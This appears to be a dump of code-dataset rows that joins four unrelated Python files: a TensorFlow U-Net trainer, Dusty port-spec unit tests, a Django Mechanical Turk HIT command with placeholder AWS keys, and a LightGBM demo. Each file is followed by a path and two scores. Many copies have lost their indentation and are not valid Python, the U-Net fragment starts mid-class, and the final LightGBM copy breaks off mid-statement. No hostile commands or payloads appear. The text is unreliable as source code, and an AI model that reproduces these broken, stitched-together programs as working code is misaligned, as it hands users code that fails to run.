        init = tf.compat.v1.global_variables_initializer()
        init_local = tf.compat.v1.local_variables_initializer()
        with tf.compat.v1.Session() as sess:
            init.run()
            init_local.run()
            training_steps_per_epoch = n_samples // self.batch_size
            for epoch in range(n_epochs):
                print("Start training epoch {}".format(epoch + 1))
                total_loss = 0
                for step in range(training_steps_per_epoch):
                    x_batch, y_batch = data_gen(images, labels, step, self.batch_size)
                    loss_val, _ = sess.run([loss, training_op], feed_dict={self.x: x_batch, self.y: y_batch})
                    total_loss += loss_val
                # Per-epoch reporting/summaries are evaluated on the last batch
                # of the epoch.
                train_iou = miou.eval(feed_dict={self.x: x_batch, self.y: y_batch})
                print("Epoch: {:}, Average loss: {:.4f}, Mean IOU: {:.4f}".format(epoch + 1,
                                                                                  total_loss / training_steps_per_epoch,
                                                                                  train_iou))
                print("\n")
                train_loss_summary = loss_summary.eval(feed_dict={self.x: x_batch, self.y: y_batch})
                train_iou_summary = iou_summary.eval(feed_dict={self.x: x_batch, self.y: y_batch})
                file_writer.add_summary(train_loss_summary, epoch)
                file_writer.add_summary(train_iou_summary, epoch)
            # Persist the final weights once training completes.
            _ = self.dump_model(sess, "../models/tf_model.ckpt")
        file_writer.close()
@staticmethod
def get_loss(y_true, y_preds, loss_mode="dice_loss"):
with tf.name_scope("loss"):
if loss_mode == "dice_loss":
loss = dice_loss(y_true=y_true, y_pred=y_preds)
elif loss_mode == "cross_entropy":
y_true_flattened = tf.reshape(y_true, [-1])
y_preds_flattened = tf.reshape(y_preds, [-1])
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=y_true_flattened,
logits=y_preds_flattened))
else:
raise ValueError("Unknown Cost Function: %s" % loss_mode)
return tf.convert_to_tensor(loss)
def get_optimizer(self, opt="Adam"):
with tf.name_scope("optimizer"):
if opt == "Adam":
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate)
elif opt == "SGD":
optimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=self.learning_rate)
return optimizer
def predict(self, x_test, y_test, model_path):
"""
Use to predict batch data so as to get predicted results
:param x_test: the test images
:param y_test: the test masks
:param model_path: the path stores trained model
:return: predictions (uint8)
"""
tf.reset_default_graph()
with tf.compat.v1.Session() as sess:
saver = tf.compat.v1.train.import_meta_graph(model_path + ".meta")
saver.restore(sess, model_path)
graph = tf.compat.v1.get_default_graph()
x = graph.get_operation_by_name("x_input").outputs[0]
y = tf.compat.v1.get_collection("network_architecture")[0]
no_samples = x_test.shape[0]
predictions = []
n_iteration = no_samples // self.batch_size
for step in range(n_iteration):
x_batch, y_batch = get_batch_data(x_test, y_test, iter_step=step, batch_size=self.batch_size)
preds = sess.run(y, feed_dict={x: x_batch})
predictions.append(preds)
return predictions
@staticmethod
def save_images(predictions, segmented_folder):
if not os.path.exists(segmented_folder):
os.mkdir(segmented_folder)
for i, batch_preds in enumerate(predictions):
batch_preds = (batch_preds >= 0.5).astype(np.uint8)
n_images = batch_preds.shape[0]
for j in range(n_images):
img_arr = img_as_int(np.squeeze(batch_preds[j]))
io.imsave(fname=segmented_folder + "/img_{}_{}.png".format(i, j), arr=img_arr)
    @staticmethod
    def dump_model(sess, model_path):
        """Save all variables of `sess` to a checkpoint at `model_path`.

        :param sess: an active tf.compat.v1.Session holding trained variables
        :param model_path: checkpoint prefix to write to
        :return: the path the checkpoint was actually written to
        """
        saver = tf.compat.v1.train.Saver()
        saved_path = saver.save(sess, model_path)
        print("Model has been saved into disk at path: %s" % saved_path)
        return saved_path
@staticmethod
def load_model(sess, model_path):
saver = tf.compat.v1.train.import_meta_graph(model_path + ".meta")
saver.restore(sess, tf.compat.v1.train.latest_checkpoint("./"))
print("Model Loaded!")
if __name__ == "__main__":
    # Script entry point: train a U-Net on the 2D image/mask pairs, then run
    # inference on the same data with the saved checkpoint.
    image_folder = "../data/2d_images/"
    masks_folder = "../data/2d_masks/"
    # # tr_paths, v_paths = get_train_val_paths(image_folder, masks_folder)
    images, labels = get_imgs_masks(image_folder, masks_folder)
    # print(images[0].shape)
    no_samples = images.shape[0]
    n_epochs = 10
    unet = UnetModel()
    unet.train(data_gen=get_batch_data, images=images, labels=labels, n_epochs=n_epochs, n_samples=no_samples)
    # NOTE(review): predicting on the training images -- there is no held-out
    # test split here.
    test_preds = unet.predict(images, labels, "../models/tf_model.ckpt")
unet.save_images(predictions=test_preds, segmented_folder="./segmented_results") | 0.746693 | 0.545528 |
from mock import patch
from ....testcases import DustyTestCase
from dusty.compiler.port_spec import (_docker_compose_port_spec, _nginx_port_spec,
_hosts_file_port_spec, get_port_spec_document,
ReusedHostFullAddress, ReusedStreamHostPort)
class TestPortSpecCompiler(DustyTestCase):
    def setUp(self):
        # Three canonical host-forwarding specs reused by the tests below:
        # two HTTP forwards (same/different host+container ports) and one
        # raw-TCP ("stream") forward.
        super(TestPortSpecCompiler, self).setUp()
        self.test_host_forwarding_spec_1 = {'container_port': 80, 'host_name': 'local.gc.com', 'host_port': 80, 'type': 'http'}
        self.test_host_forwarding_spec_2 = {'container_port': 8000, 'host_name': 'local.alex.com', 'host_port': 8001, 'type': 'http'}
        self.test_host_forwarding_spec_3 = {'container_port': 22, 'host_name': 'local.ssh.com', 'host_port': 8000, 'type': 'stream'}
    def test_docker_compose_port_spec_1(self):
        # Container port is taken from the forwarding spec; the mapped host
        # port is the leased port argument, and both come back as strings.
        self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_1, '65000'),
                         {'in_container_port': '80',
                          'mapped_host_port': '65000'})
    def test_docker_compose_port_spec_2(self):
        # Same mapping with distinct container (8000) and leased (65001) ports.
        self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_2, '65001'),
                         {'in_container_port': '8000',
                          'mapped_host_port': '65001'})
    def test_docker_compose_port_spec_3(self):
        # Stream-type forwardings produce the same docker-compose mapping shape.
        self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_3, '65001'),
                         {'in_container_port': '22',
                          'mapped_host_port': '65001'})
    def test_nginx_port_spec_1(self):
        # nginx proxies the leased port back to host_name:host_port; the
        # forwarding type ("http") is carried through.
        self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_1, '65000', '192.168.5.10'),
                         {'proxied_port': '65000',
                          'host_address': 'local.gc.com',
                          'host_port': '80',
                          'type': 'http'})
    def test_nginx_port_spec_2(self):
        # Same shape for a forwarding whose host and container ports differ.
        self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_2, '65001', '192.168.5.10'),
                         {'proxied_port': '65001',
                          'host_address': 'local.alex.com',
                          'host_port': '8001',
                          'type': 'http'})
    def test_nginx_port_spec_3(self):
        # Stream forwardings keep type 'stream' in the nginx spec.
        self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_3, '65001', '192.168.5.10'),
                         {'proxied_port': '65001',
                          'host_address': 'local.ssh.com',
                          'host_port': '8000',
                          'type': 'stream'})
    def test_hosts_file_port_spec_1(self):
        # Hosts-file entries map the forwarding's host name to the VM IP;
        # ports are irrelevant at this layer.
        self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_1),
                         {'forwarded_ip': '1.1.1.1',
                          'host_address': 'local.gc.com'})
    def test_hosts_file_port_spec_2(self):
        # Same mapping for the second spec's host name.
        self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_2),
                         {'forwarded_ip': '1.1.1.1',
                          'host_address': 'local.alex.com'})
    def test_hosts_file_port_spec_3(self):
        # Stream forwardings produce ordinary hosts-file entries too.
        self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_3),
                         {'forwarded_ip': '1.1.1.1',
                          'host_address': 'local.ssh.com'})
    def test_get_port_spec_document_1_app(self):
        # One app, one forwarding: the first leased port (65000) is proxied by
        # nginx to the host name/port, and the hosts file points the host name
        # at the forwarded IP.
        expanded_spec = {'apps':
                             {'gcweb':
                                  {'host_forwarding': [{'host_name': 'local.gc.com',
                                                        'host_port': 80,
                                                        'container_port': 80,
                                                        'type': 'http'}]}}}
        correct_port_spec = {'docker_compose': {'gcweb': [{'in_container_port': '80',
                                                           'mapped_host_port': '65000'}]},
                             'nginx': [{'proxied_port': '65000',
                                        'host_address': 'local.gc.com',
                                        'host_port': '80',
                                        'type': 'http'}],
                             'hosts_file': [{'forwarded_ip': '192.168.5.10',
                                             'host_address': 'local.gc.com'}]}
        self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
    def test_get_port_spec_document_2_apps(self):
        # Two apps with distinct host names: ports are leased in app-name
        # order (gcapi before gcweb), so gcapi gets 65000 and gcweb 65001.
        expanded_spec = {'apps':
                             {'gcweb':
                                  {'host_forwarding': [{'host_name': 'local.gc.com',
                                                        'host_port': 80,
                                                        'container_port': 80,
                                                        'type': 'http'}]},
                              'gcapi':
                                  {'host_forwarding': [{'host_name': 'local.gcapi.com',
                                                        'host_port': 8000,
                                                        'container_port': 8001,
                                                        'type': 'http'}]}}}
        correct_port_spec = {'docker_compose': {'gcweb': [{'in_container_port': '80',
                                                           'mapped_host_port': '65001'}],
                                                'gcapi': [{'in_container_port': '8001',
                                                           'mapped_host_port': '65000'}]},
                             'nginx': [{'proxied_port': '65000',
                                        'host_address': 'local.gcapi.com',
                                        'host_port': '8000',
                                        'type': 'http'},
                                       {'proxied_port': '65001',
                                        'host_address': 'local.gc.com',
                                        'host_port': '80',
                                        'type': 'http'}],
                             'hosts_file': [{'forwarded_ip': '192.168.5.10',
                                             'host_address': 'local.gcapi.com'},
                                            {'forwarded_ip': '192.168.5.10',
                                             'host_address': 'local.gc.com'}]}
        self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
    def test_get_port_spec_document_2_apps_same_host_port(self):
        # Two apps sharing one host name (different host ports): nginx gets
        # two entries but the hosts file is deduplicated to a single entry.
        expanded_spec = {'apps':
                             {'gcweb':
                                  {'host_forwarding': [{'host_name': 'local.gc.com',
                                                        'host_port': 80,
                                                        'container_port': 80,
                                                        'type': 'http'}]},
                              'gcapi':
                                  {'host_forwarding': [{'host_name': 'local.gc.com',
                                                        'host_port': 8000,
                                                        'container_port': 8001,
                                                        'type': 'http'}]}}}
        correct_port_spec = {'docker_compose': {'gcweb': [{'in_container_port': '80',
                                                           'mapped_host_port': '65001'}],
                                                'gcapi': [{'in_container_port': '8001',
                                                           'mapped_host_port': '65000'}]},
                             'nginx': [{'proxied_port': '65000',
                                        'host_address': 'local.gc.com',
                                        'host_port': '8000',
                                        'type': 'http'},
                                       {'proxied_port': '65001',
                                        'host_address': 'local.gc.com',
                                        'host_port': '80',
                                        'type': 'http'}],
                             'hosts_file': [{'forwarded_ip': '192.168.5.10',
                                             'host_address': 'local.gc.com'}]}
        self.maxDiff = None
        self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
    def test_port_spec_throws_full_address_error(self):
        # Two apps claiming the identical host_name:host_port pair must be
        # rejected with ReusedHostFullAddress.
        expanded_spec = {'apps':
                             {'gcweb':
                                  {'host_forwarding': [{'host_name': 'local.gc.com',
                                                        'host_port': 80,
                                                        'container_port': 80,
                                                        'type': 'http'}]},
                              'gcapi':
                                  {'host_forwarding': [{'host_name': 'local.gc.com',
                                                        'host_port': 80,
                                                        'container_port': 81,
                                                        'type': 'http'}]}}}
        with self.assertRaises(ReusedHostFullAddress):
            get_port_spec_document(expanded_spec, '192.168.5.10')
    def test_port_spec_throws_stream_host_port(self):
        # Stream forwardings cannot share a host port even across different
        # host names (TCP has no virtual-host routing) -> ReusedStreamHostPort.
        expanded_spec = {'apps':
                             {'gcweb':
                                  {'host_forwarding': [{'host_name': 'local.gc.com',
                                                        'host_port': 80,
                                                        'container_port': 80,
                                                        'type': 'stream'}]},
                              'gcapi':
                                  {'host_forwarding': [{'host_name': 'local.api.com',
                                                        'host_port': 80,
                                                        'container_port': 81,
                                                        'type': 'stream'}]}}}
        with self.assertRaises(ReusedStreamHostPort):
            get_port_spec_document(expanded_spec, '192.168.5.10')
    def test_app_with_multiple_host_forwardings(self):
        # One app may declare several forwardings; each gets its own leased
        # port and nginx entry, while the hosts file stays deduplicated.
        expanded_spec = {'apps':
                             {'gcweb':
                                  {'host_forwarding': [{'host_name': 'local.gc.com',
                                                        'host_port': 80,
                                                        'container_port': 80,
                                                        'type': 'http'},
                                                       {'host_name': 'local.gc.com',
                                                        'host_port': 81,
                                                        'container_port': 81,
                                                        'type': 'http'}]},
                              'gcapi':
                                  {'host_forwarding': [{'host_name': 'local.gcapi.com',
                                                        'host_port': 82,
                                                        'container_port': 82,
                                                        'type': 'http'}]}}}
        correct_port_spec = {'docker_compose': {'gcweb': [{'in_container_port': '80',
                                                           'mapped_host_port': '65001'},
                                                          {'in_container_port': '81',
                                                           'mapped_host_port': '65002'}],
                                                'gcapi': [{'in_container_port': '82',
                                                           'mapped_host_port': '65000'}]},
                             'nginx': [{'proxied_port': '65000',
                                        'host_address': 'local.gcapi.com',
                                        'host_port': '82',
                                        'type': 'http'},
                                       {'proxied_port': '65001',
                                        'host_address': 'local.gc.com',
                                        'host_port': '80',
                                        'type': 'http'},
                                       {'proxied_port': '65002',
                                        'host_address': 'local.gc.com',
                                        'host_port': '81',
                                        'type': 'http'}],
                             'hosts_file': [{'forwarded_ip': '192.168.5.10',
                                             'host_address': 'local.gcapi.com'},
                                            {'forwarded_ip': '192.168.5.10',
                                             'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec) | tests/unit/compiler/port_spec/init_test.py | from mock import patch
from ....testcases import DustyTestCase
from dusty.compiler.port_spec import (_docker_compose_port_spec, _nginx_port_spec,
_hosts_file_port_spec, get_port_spec_document,
ReusedHostFullAddress, ReusedStreamHostPort)
class TestPortSpecCompiler(DustyTestCase):
def setUp(self):
super(TestPortSpecCompiler, self).setUp()
self.test_host_forwarding_spec_1 = {'container_port': 80, 'host_name': 'local.gc.com', 'host_port': 80, 'type': 'http'}
self.test_host_forwarding_spec_2 = {'container_port': 8000, 'host_name': 'local.alex.com', 'host_port': 8001, 'type': 'http'}
self.test_host_forwarding_spec_3 = {'container_port': 22, 'host_name': 'local.ssh.com', 'host_port': 8000, 'type': 'stream'}
def test_docker_compose_port_spec_1(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_1, '65000'),
{'in_container_port': '80',
'mapped_host_port': '65000'})
def test_docker_compose_port_spec_2(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_2, '65001'),
{'in_container_port': '8000',
'mapped_host_port': '65001'})
def test_docker_compose_port_spec_3(self):
self.assertEqual(_docker_compose_port_spec(self.test_host_forwarding_spec_3, '65001'),
{'in_container_port': '22',
'mapped_host_port': '65001'})
def test_nginx_port_spec_1(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_1, '65000', '192.168.5.10'),
{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'})
def test_nginx_port_spec_2(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_2, '65001', '192.168.5.10'),
{'proxied_port': '65001',
'host_address': 'local.alex.com',
'host_port': '8001',
'type': 'http'})
def test_nginx_port_spec_3(self):
self.assertEqual(_nginx_port_spec(self.test_host_forwarding_spec_3, '65001', '192.168.5.10'),
{'proxied_port': '65001',
'host_address': 'local.ssh.com',
'host_port': '8000',
'type': 'stream'})
def test_hosts_file_port_spec_1(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_1),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.gc.com'})
def test_hosts_file_port_spec_2(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_2),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.alex.com'})
def test_hosts_file_port_spec_3(self):
self.assertEqual(_hosts_file_port_spec('1.1.1.1', self.test_host_forwarding_spec_3),
{'forwarded_ip': '1.1.1.1',
'host_address': 'local.ssh.com'})
def test_get_port_spec_document_1_app(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_get_port_spec_document_2_apps(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gcapi.com',
'host_port': 8000,
'container_port': 8001,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'}],
'gcapi':[{'in_container_port': '8001',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gcapi.com',
'host_port': '8000',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gcapi.com'},
{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_get_port_spec_document_2_apps_same_host_port(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 8000,
'container_port': 8001,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'}],
'gcapi':[{'in_container_port': '8001',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '8000',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.maxDiff = None
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_port_spec_throws_full_address_error(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 81,
'type': 'http'}]}}}
with self.assertRaises(ReusedHostFullAddress):
get_port_spec_document(expanded_spec, '192.168.5.10')
def test_port_spec_throws_stream_host_port(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'stream'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.api.com',
'host_port': 80,
'container_port': 81,
'type': 'stream'}]}}}
with self.assertRaises(ReusedStreamHostPort):
get_port_spec_document(expanded_spec, '192.168.5.10')
def test_app_with_multiple_host_forwardings(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'},
{'host_name': 'local.gc.com',
'host_port': 81,
'container_port': 81,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gcapi.com',
'host_port': 82,
'container_port': 82,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'},
{'in_container_port': '81',
'mapped_host_port': '65002'}],
'gcapi':[{'in_container_port': '82',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gcapi.com',
'host_port': '82',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'},
{'proxied_port': '65002',
'host_address': 'local.gc.com',
'host_port': '81',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gcapi.com'},
{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec) | 0.47658 | 0.149656 |
from django.core.management.base import BaseCommand, CommandError
from django.core.urlresolvers import reverse
from boto1.models import Image, Hit
from optparse import make_option
import urlparse
import boto
import boto.mturk
import boto.mturk.connection
_mturk_connexion = None
def get_connection():
    """Return a lazily-created, module-cached MTurk sandbox connection."""
    global _mturk_connexion
    if _mturk_connexion is None:
        # SECURITY(review): credentials are hard-coded placeholders; move the
        # real values into settings/environment, never into source control.
        # The host pins this to the MTurk *sandbox*, not production.
        _mturk_connexion = boto.mturk.connection.MTurkConnection(
            aws_access_key_id="my_secret",
            aws_secret_access_key='my_secret_key',
            debug=True,
            host='mechanicalturk.sandbox.amazonaws.com')
    return _mturk_connexion
def create_external_question_hit(title, url):
    """Create an MTurk HIT that embeds `url` as an external question.

    :param title: HIT title shown to workers
    :param url: page the worker is shown in the MTurk iframe (500 px tall)
    :return: the boto ResultSet returned by create_hit
    """
    question = boto.mturk.question.ExternalQuestion(url, 500)
    # Reward is in USD per assignment.
    new_hit = get_connection().create_hit(
        question=question,
        title=title,
        description="Django minimalistic test",
        reward=0.02,
        keywords="image,processing,segmentation")
    return new_hit
class Command(BaseCommand):
    """Management command that creates MTurk HITs for unsynchronised images."""
    help = 'Synchronize the content not sent yet to Amazon'
    # --base_url is mandatory in practice (handle() raises without it); it is
    # used to build absolute annotation-form URLs for the external questions.
    option_list = BaseCommand.option_list + (
        make_option(
            '--base_url',
            dest='base_url',
            default=None,
            type='string',
            help='The base URL of the server'),
    )
def handle(self, *args, **options):
nb_hit_created = 0
if options['base_url']:
root_url = urlparse.urlparse(options['base_url'])
else:
raise RuntimeError('The base URL of the server should be set')
for image_object in Image.objects.filter(hit__isnull=False).distinct():
self.stdout.write(' * %-50s %s' % (image_object.name, ' '.join(i.hit_id for i in image_object.hit.all())))
images_to_sync = Image.objects.filter(hit__isnull=True).distinct()
for image_object in images_to_sync:
url_image = urlparse.urlunparse((root_url.scheme, root_url.netloc, root_url.path.rstrip('/') + reverse('image_annotation_form', args=[image_object.id]), '','',''))
new_hit = create_external_question_hit(
'botox',
url_image)
try:
current_hit = Hit.objects.create(image = image_object, hit_id = new_hit[0].HITId)
except Exception, e:
self.stderr.write(' hit not added to the database but added to Amazon for image %s %r' % (image_object.name, new_hit))
continue
self.stdout.write(' + %-50s %s' % (image_object.name, current_hit.hit_id))
nb_hit_created += 1
self.stdout.write('Successfully created the hits')
self.stdout.write('- New hits created %d' % nb_hit_created)
self.stdout.write('- Current number of images %d' % Image.objects.count()) | boto1/management/commands/create_hits.py | from django.core.management.base import BaseCommand, CommandError
from django.core.urlresolvers import reverse
from boto1.models import Image, Hit
from optparse import make_option
import urlparse
import boto
import boto.mturk
import boto.mturk.connection
_mturk_connexion = None
def get_connection():
global _mturk_connexion
if _mturk_connexion is None:
_mturk_connexion = boto.mturk.connection.MTurkConnection(
aws_access_key_id="my_secret",
aws_secret_access_key='my_secret_key',
debug=True,
host='mechanicalturk.sandbox.amazonaws.com')
return _mturk_connexion
def create_external_question_hit(title, url):
question = boto.mturk.question.ExternalQuestion(url, 500)
new_hit = get_connection().create_hit(
question=question,
title=title,
description="Django minimalistic test",
reward=0.02,
keywords="image,processing,segmentation")
return new_hit
class Command(BaseCommand):
help = 'Synchronize the content not sent yet to Amazon'
option_list = BaseCommand.option_list + (
make_option(
'--base_url',
dest='base_url',
default=None,
type='string',
help='The base URL of the server'),
)
def handle(self, *args, **options):
nb_hit_created = 0
if options['base_url']:
root_url = urlparse.urlparse(options['base_url'])
else:
raise RuntimeError('The base URL of the server should be set')
for image_object in Image.objects.filter(hit__isnull=False).distinct():
self.stdout.write(' * %-50s %s' % (image_object.name, ' '.join(i.hit_id for i in image_object.hit.all())))
images_to_sync = Image.objects.filter(hit__isnull=True).distinct()
for image_object in images_to_sync:
url_image = urlparse.urlunparse((root_url.scheme, root_url.netloc, root_url.path.rstrip('/') + reverse('image_annotation_form', args=[image_object.id]), '','',''))
new_hit = create_external_question_hit(
'botox',
url_image)
try:
current_hit = Hit.objects.create(image = image_object, hit_id = new_hit[0].HITId)
except Exception, e:
self.stderr.write(' hit not added to the database but added to Amazon for image %s %r' % (image_object.name, new_hit))
continue
self.stdout.write(' + %-50s %s' % (image_object.name, current_hit.hit_id))
nb_hit_created += 1
self.stdout.write('Successfully created the hits')
self.stdout.write('- New hits created %d' % nb_hit_created)
self.stdout.write('- Current number of images %d' % Image.objects.count()) | 0.298389 | 0.064036 |
# Minimal LightGBM demo: label-encode a small CSV dataset, train a GBDT
# (regression or multiclass), predict on the training data and optionally
# plot the first tree.
import lightgbm as lgb
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#--------------------------------
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin'
#--------------------------------
#parameters
is_regression = True
plotTree = False
#--------------------------------
#data set
#dataset = pd.read_csv('dataset/golf.txt')
dataset = pd.read_csv('dataset/golf2.txt')
#dataset = pd.read_csv('dataset/iris.data', names=["Sepal length","Sepal width","Petal length","Petal width","Decision"])
#--------------------------------
#label encoding
#you must convert both categorical features to int in LightGBM
print("label encoding procedures:")
features = []; categorical_features = []
num_of_rows = dataset.shape[0]
num_of_columns = dataset.shape[1]
num_of_classes = 1  #default for regression
for i in range(0, num_of_columns):
    column_name = dataset.columns[i]
    column_type = dataset[column_name].dtypes
    if i != num_of_columns - 1:  #skip target
        features.append(column_name)
    if column_type == 'object':
        print(column_name, ": ", end='')
        feature_classes = dataset[column_name].unique()
        # For classification, the number of classes is taken from the target
        # column (the last one).  Use truthiness instead of `== False`.
        if not is_regression and i == num_of_columns - 1:
            num_of_classes = len(feature_classes)
        # Replace each category with its index, encoded as a string.
        for j in range(len(feature_classes)):
            feature_class = feature_classes[j]
            print(feature_class, " -> ", j, ", ", end='')
            dataset[column_name] = dataset[column_name].replace(feature_class, str(j))
        if i != num_of_columns - 1:  #skip target
            categorical_features.append(column_name)
        print("")
print("num_of_classes: ", num_of_classes)
print("features: ", features)
print("categorical features: ", categorical_features)
print("\nencoded dataset:\n", dataset.head())
#--------------------------------
# Split the frame into feature matrix and target vector (last column).
target_name = dataset.columns[num_of_columns - 1]
y_train = dataset[target_name].values
x_train = dataset.drop(columns=[target_name]).values
lgb_train = lgb.Dataset(x_train, y_train
                        , feature_name=features
                        , categorical_feature=categorical_features
                        )
# Truthiness (`if is_regression:`) replaces the `== True` anti-pattern below.
params = {
    'task': 'train'
    , 'boosting_type': 'gbdt'
    , 'objective': 'regression' if is_regression else 'multiclass'
    , 'num_class': num_of_classes
    , 'metric': 'rmsle' if is_regression else 'multi_logloss'
    , 'min_data': 1
    #, 'learning_rate':0.1
    , 'verbose': -1
}
gbm = lgb.train(params
                , lgb_train
                , num_boost_round=50
                #, valid_sets=lgb_eval
                )
predictions = gbm.predict(x_train)
#--------------------------------
# Compare predictions against the (encoded) training targets.
for index, instance in dataset.iterrows():
    actual = instance[target_name]
    if is_regression:
        prediction = round(predictions[index])
    else:  #classification: pick the highest-probability class
        prediction = np.argmax(predictions[index])
    print((index + 1), ". actual= ", actual, ", prediction= ", prediction)
if plotTree:
    ax = lgb.plot_tree(gbm)
    plt.show()
#ax = lgb.plot_importance(gbm, max_num_features=10)
#plt.show() | python/LightGBM/LightGBM.py | import lightgbm as lgb
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#--------------------------------
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin'
#--------------------------------
#parameters
is_regression = True
plotTree = False
#--------------------------------
#data set
#dataset = pd.read_csv('dataset/golf.txt')
dataset = pd.read_csv('dataset/golf2.txt')
#dataset = pd.read_csv('dataset/iris.data', names=["Sepal length","Sepal width","Petal length","Petal width","Decision"])
#--------------------------------
#label encoding
#you must convert both categorical features to int in LightGBM
print("label encoding procedures:")
features = []; categorical_features = []
num_of_rows = dataset.shape[0]
num_of_columns = dataset.shape[1]
num_of_classes = 1 #default for regression
for i in range(0, num_of_columns):
column_name = dataset.columns[i]
column_type = dataset[column_name].dtypes
if i != num_of_columns - 1: #skip target
features.append(column_name)
if column_type == 'object':
print(column_name,": ", end='')
feature_classes = dataset[column_name].unique()
#print(feature_classes)
if is_regression == False and i == num_of_columns - 1:
num_of_classes = len(feature_classes)
for j in range(len(feature_classes)):
feature_class = feature_classes[j]
print(feature_class," -> ",j,", ",end='')
dataset[column_name] = dataset[column_name].replace(feature_class, str(j))
if i != num_of_columns - 1: #skip target
categorical_features.append(column_name)
print("")
print("num_of_classes: ",num_of_classes)
print("features: ",features)
print("categorical features: ",categorical_features)
print("\nencoded dataset:\n",dataset.head())
#--------------------------------
target_name = dataset.columns[num_of_columns - 1]
y_train = dataset[target_name].values
x_train = dataset.drop(columns=[target_name]).values
#print(x_train); print(y_train)
lgb_train = lgb.Dataset(x_train, y_train
,feature_name = features
, categorical_feature = categorical_features
)
params = {
'task': 'train'
, 'boosting_type': 'gbdt'
, 'objective': 'regression' if is_regression == True else 'multiclass'
, 'num_class': num_of_classes
, 'metric': 'rmsle' if is_regression == True else 'multi_logloss'
, 'min_data': 1
#, 'learning_rate':0.1
, 'verbose': -1
}
gbm = lgb.train(params
, lgb_train
